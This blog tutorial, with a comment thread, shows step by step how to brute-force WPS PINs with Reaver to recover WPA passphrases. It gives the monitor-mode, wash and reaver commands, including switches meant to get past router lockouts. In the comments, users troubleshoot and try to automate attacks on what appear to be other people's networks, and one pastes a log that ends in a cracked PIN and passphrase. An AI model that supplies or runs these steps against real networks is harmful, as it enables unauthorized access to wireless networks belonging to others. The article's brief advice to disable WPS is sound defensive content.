WPS Cracking with Reaver

We’ve previously covered how ineffectual WEP encryption is for securing a wireless network, showing that the Pwn Plug R3 can easily break into a WEP network in less than one minute. But considering how old WEP is, that shouldn’t really come as much of a surprise. Most networks will now be running the much more robust WiFi Protected Access (WPA), with WEP running mainly on the older systems that haven’t been updated or maintained.

But while it’s not as trivial as breaking into a WEP network, WPA is not completely infallible. Here we will take a look at one of the methods used to crack into a WPA network, and some of the pitfalls you may encounter.

 

WPS Pin Attack

An often overlooked feature on many WiFi routers and access points is WiFi Protected Setup (WPS). This is a convenient feature that allows the user to configure a client device against a wireless network by simultaneously pressing a button on both the access point and the client device (the client side “button” is often in software) at the same time. The devices trade information, and then set up a secure WPA link.

On the surface, this is a very clever feature. It allows less savvy users to establish a secure connection between their devices quickly and easily, and as it requires physical access to the hardware, it would seem relatively secure.

But a tool called Reaver has been designed to brute-force the WPA handshaking process remotely, even if the physical button hasn’t been pressed on the access point.

While some newer devices are building in protection against this specific attack, the Reaver WPS exploit remains useful on many networks in the field.

Note: To be clear, WPS is the vulnerable system in this case, not WPA. If a network has WPS disabled (which they should, given the existence of tools such as this), it will be immune to the following attack.

 

Finding a Network

If you’ve read the previous tutorial on cracking into a WEP network, you’ll recognize the command used to get the hardware into monitor mode:

 

airmon-ng start wlan0

 

From here you could use airodump-ng to look for networks, but Reaver actually includes its own tool for finding vulnerable WPS implementations which is much more straightforward. To start it, run the following command:

 

wash -i mon0

 

The output will look something like this:

WPS Cracking

This shows two networks which are, at least in theory, vulnerable to the WPS brute force attack Reaver uses. Note the “WPS Locked” column; this is far from a definitive indicator, but in general, you’ll find that APs which are listed as unlocked are much more likely to be susceptible to brute forcing. You can still attempt to launch an attack against a network which is WPS locked, but the chances of success aren’t very good.

 

Launching Reaver

Once you’ve found a network you wish to run the attack against, operating Reaver is very straightforward. The basic command needs only the local interface, channel, and ESSID to be specified. The command to launch Reaver against the “linksys” network above would look like this:

 

reaver -i mon0 -c 6 -b 00:23:69:48:33:95 -vv

 

The only part of the above command that might not be immediately obvious is “-vv”; this enables verbose output which greatly helps when trying to gauge how well Reaper is (or is not) progressing.

Once you’ve started Reaver, you’ll start seeing output like this:

Reaver

This output shows that WPS pins are successfully being tried against the target (here we see 12345670 and 00005678 are being tested), and Reaver is operating normally.

 

Advanced Options

Ideally, the basic command works and the attack progresses as expected. But in reality, different manufacturers have been trying to implement protections against Reaver-style attacks, and additional options may be required to get the attack moving.

As an example, the following command adds a few optional switches that can help to get Reaver working on more picky devices:

 

reaver -i mon0 -c 6 -b 00:23:69:48:33:95  -vv -L -N -d 15 -T .5 -r 3:15

 

The core command hasn’t changed, the additional switches just change how Reaver behaves:

-L

Ignore locked WPS state.

-N

Don’t send NACK packets when errors are detected.

-d 15

Delay 15 seconds between PIN attempts.

-T

Set timeout period to half a second.

-r 3:15

After 3 attempts, sleep for 15 seconds

 

This is by no means an exhaustive list of Reaver options, but it gives an idea on what kind of things you might want to try.

 

Attack Duration

Even under ideal conditions, Reaver can take a very long time to complete its run. There is an element of chance involved, the brute forcing could theoretically discover the PIN very quickly, but in general it is going to take many hours to even make a dent in the possible pool of PINs.

Luckily, Reaver keeps a progress log file automatically, so you can stop the attack at any time and resume whenever it’s convenient. Spending a few hours a day running Reaver against the same network should uncover its PIN and through that the WPA passphrase…eventually.


Learn More About Rogue Devices

25 replies
    • 1withyou2
      1withyou2 says:

      It means you are no longer associated it with the AP
      I fix mine running airodump-ng mon0 for about 10 seconds. and then I re run reaver

      Reply
  1. 1withyou2
    1withyou2 says:

    Is there a way to have reaver RE associate with the AP .
    Mine gets stuck at trying ping 18295672
    then I quit reaver with CTRL + C
    and run airodump-ng mon0
    then re run my reaver code and it starts working until the same thing happens which means I can’t leave it running over night.

    Any ideas?
    By the way this is my code reaver -i mon0 -b C0:C1:C0:C0:40:2F -S -N -a -c 1 -vv -r 17:30
    it works for about 15 minutes until I get
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] Trying pin 19525679
    [!] WARNING: Failed to associate with C0:C1:C0:C0:40:2F (ESSID: BeeNet)
    [!] WARNING: Failed to associate with C0:C1:C0:C0:40:2F (ESSID: BeeNet)
    ^C
    [+] Session saved.

    Then I have to run airodump-ng mon0
    and then my code for it to start working
    How can I automate this process?

    Reply
  2. john
    john says:

    when i tried to crack a network with reaver it went good…..i got a speed of 3seconds/pin …..but after some time its wps got locked initially it was not locked……then i tried reaver on other network and after some time of succesful bruteforcing it also went to lock…..what should i do to unlock it i fear if i tried it on another networks they may get locked forever …….waiting for expert advice….my gmail is johnkhalifa1889@gmaul.com

    Reply
  3. Nope
    Nope says:

    > When i typed “wash -i mon0″,it showed:Failed to open mon0for capturing

    Try `sudo wash -i mon0` to make it work. 😉

    Reply
  4. salvatore
    salvatore says:

    Switching mon0 to channel 6
    [+] Waiting for beacon from B8:A3:86:E9:D6:7B
    [+] Associated with B8:A3:86:E9:D6:7B (ESSID: MAX02)
    [+] Trying pin ******
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 9c:1a:20:8c:91:e2:b1:4a:bb:dd:3d:d0:db:c5:62:01
    [P] PKE: a5:1b:fe:4d:7f:b6:ab:71:37:66:8e:81:68:6d:a1:67:6d:2e:4f:07:8b:e6:87:66:40:fd:88:75:79:06:d3:b3:fc:a5:0a:92:03:16:0f:cf:dd:fa:98:3e:46:5a:78:07:15:ef:53:d1:f8:36:d0:2c:37:92:4a:50:68:2c:55:23:c5:ca:05:01:87:38:5f:db:1f:c4:54:5c:5b:c2:58:d9:3a:e3:92:b4:4d:47:b5:4b:a9:66:db:6d:9d:8d:f0:7c:6b:73:65:00:ca:b1:20:60:81:46:d4:f2:ab:59:d9:d3:df:18:54:85:fa:d9:62:33:cc:77:4a:ad:eb:29:f3:bd:23:85:64:d5:3f:93:6a:ab:da:ba:ce:58:12:83:97:7d:70:07:a3:c4:40:44:be:23:5d:38:a1:82:55:d3:cf:31:8c:29:4b:dd:cb:e7:c8:cf:62:1b:4e:63:e5:f9:2d:d1:7f:0c:3c:b2:4b:ec:6a:17:8e:6e:96:38:02:b4:2f:fd
    [P] WPS Manufacturer: Ayecom
    [P] WPS Model Number: DSL2740
    [+] Received M1 message
    [P] AuthKey: 0b:c4:98:45:a2:4d:43:5a:aa:2d:bd:f9:25:84:6f:0a:86:70:aa:97:c5:d0:2e:15:c4:50:88:1c:71:df:9d:98
    [+] Sending M2 message
    [P] E-Hash1: e8:37:20:b7:74:0a:f4:8a:15:f7:26:98:69:6e:d5:5d:cd:9e:c6:50:a4:aa:2f:bf:2f:32:e6:aa:f0:51:9d:a1
    [P] E-Hash2: 11:9e:b6:bc:85:7b:54:fc:97:51:40:bb:ca:bf:ea:bd:d5:0b:b6:9a:f8:4e:c9:05:12:03:8a:bb:8d:7f:57:51
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M3 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x03), re-trying last pin
    [+] Trying pin *******
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 55:1d:25:ad:f3:ff:0c:ec:5a:7f:4c:89:31:1e:69:0b
    [P] PKE: 80:e1:0e:63:30:6b:a9:35:cf:ff:dd:e9:35:ca:ce:51:7e:fc:cb:07:b0:9a:7c:a5:2e:08:32:fd:45:01:3a:95:ec:b9:ea:ab:47:3e:a8:07:04:41:01:7e:91:85:98:a7:6f:7c:e7:37:8f:d6:46:c4:a4:34:50:5a:65:ec:d0:ba:ec:e9:68:84:51:ba:1a:8c:28:f8:e2:0c:0f:1e:e6:34:7a:3c:89:22:1a:31:20:fa:cd:2b:21:11:07:b2:7d:07:72:fe:69:07:6f:50:17:09:04:f6:be:5b:20:07:e2:78:50:66:f8:a5:9f:9d:9b:67:3c:6d:ba:61:06:28:7f:7b:b5:3e:3a:ba:90:34:5a:ba:3d:b7:4c:ce:5b:07:ba:94:35:e0:c6:59:c8:c5:6d:ce:a3:f0:59:2a:18:78:38:cf:2e:48:66:50:03:01:83:36:cf:eb:40:e5:9b:4e:19:5b:19:7e:9b:45:ae:bc:37:44:0f:73:75:21:d4:3c:0c:9d
    [P] WPS Manufacturer: Ayecom
    [P] WPS Model Number: ********
    [+] Received M1 message
    [P] AuthKey: f8:1f:49:9d:30:0a:71:aa:4a:50:2c:64:d8:ff:ea:dc:91:3e:4d:61:55:53:9f:5a:1e:df:21:9a:b9:2d:5d:d0
    [+] Sending M2 message
    [P] E-Hash1: 59:e9:b4:ca:6b:ce:cd:85:16:1f:a6:bb:b8:1d:37:fc:d6:b1:21:ca:54:5b:1f:41:ee:2b:71:7b:fc:2f:56:5a
    [P] E-Hash2: 8c:56:ee:22:95:27:09:96:8d:fa:ca:81:ba:f4:14:e0:c1:5f:41:78:a7:b3:e2:6e:f1:3c:1c:9b:bc:a9:50:ac
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Received M7 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [+] Pin cracked in 11 seconds
    [+] WPS PIN: ‘********’
    [+] WPA PSK: ‘****************************************************************************************************
    [+] AP SSID: ‘Network-b8a386e9d67b’
    [+] Nothing done, nothing to save.

    ESSIS and AP SSID is different why??

    Reply
  5. Cyber wolf mad
    Cyber wolf mad says:

    I wanted to know… i know wps pin.. then how can i use it to crack directly instead of waiting for reaver to crack lon again for hours???

    Reply
  6. Nirvana1327
    Nirvana1327 says:

    Reaver is dead. All new routers stop Reaver in its tracks. Yes there are some legacy old crappy routers out there still vulnerable to the WPS attack but they are becoming less and less common with time. Consider the Reaver code hasn’t been updated in 3 years now. You’ll have rely on more serious methods to break WPA encryption which isn’t as cookie cutter newbie friendly like Reaver was. Reaver was great for its time but alas all good things come to an end.

    Reply
  7. Pumpkin_Master
    Pumpkin_Master says:

    So can anyone explain why it tries the same pin over and over? I left it running all day and all night and it just keeps trying the same combination of numbers (12345670).

    Reply
  8. kron77
    kron77 says:

    what the fuck is wps transaction failed x02?

    does this mean the entire attach is useless?

    ima let it run for 5 hour to see whats up

    look forwards to a good answer thanks m.

    Reply
  9. Haroon
    Haroon says:

    I’m using reaver on android (Samsung galaxy s2), I just want to know that is it normal for my attack to take over a week? I started an attack and it’s been going continously for couple of days now and I’ve been keeping track of when it says 39.87% completed and I think it will take just over a week (approx) is this normal? And why does it take so long cause on websites it say max 10 hrs? Plz email reply to haroon815@hotmail.co.uk ty I’m just curious, it’s working fine, just curious on why it takes so long for me compared to what the Internet says.

    Reply
  10. Wps
    Wps says:

    I made a video specifically for wps routers that get locked by reaver /bully. Search YouTube for how to hack wps locked routers using vmr mdk. Please like it, share it, and subscribe to my channel!

    Reply

Leave a Reply

Want to join the discussion?
Feel free to contribute!

Leave a Reply

Your email address will not be published. Required fields are marked *